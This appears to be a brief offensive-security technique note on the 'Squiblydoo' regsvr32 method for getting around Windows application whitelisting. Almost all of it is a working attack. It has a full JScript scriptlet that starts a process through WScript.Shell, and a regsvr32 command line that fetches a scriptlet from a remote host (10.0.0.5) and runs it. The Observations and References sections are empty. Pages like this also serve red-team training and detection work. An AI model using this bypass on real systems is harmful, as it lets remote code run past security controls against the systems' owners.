regsvr32
regsvr32 (squiblydoo) code execution - bypass application whitelisting.
Execution
<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>regsvr32.exe /s /i:http://10.0.0.5/back.sct scrobj.dllObservations



References
Last updated